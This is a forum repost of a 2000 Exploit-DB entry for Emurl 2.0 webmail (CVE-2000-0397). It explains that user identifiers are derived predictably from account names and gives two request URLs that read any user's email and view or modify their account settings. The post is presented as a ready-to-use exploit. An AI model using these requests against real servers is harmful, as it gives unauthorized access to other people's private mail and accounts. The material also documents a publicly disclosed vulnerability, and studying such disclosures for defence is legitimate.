Exploit Seattle Lab Software Emurl 2.0 - Email Account Access

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19914
Проверка EDB
  1. Пройдено
Автор
PIERRE BENOIT
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2000-0397
Дата публикации
2000-05-15
Seattle Lab Software Emurl 2.0 - Email Account Access
Код:
source: https://www.securityfocus.com/bid/1203/info

Emurl software creates a unique identifier for each user, based on their account name. This identifier is encoded using the ascii value of each character in the account name and augmented by its position. By using a specific URL along with a user's identifier, it is possible to retreive that users e-mail as well as view and change their account settings.

To read email:
http://target/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier>

To view/modify account settings:
http://target/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier>
 
Источник
www.exploit-db.com

Похожие темы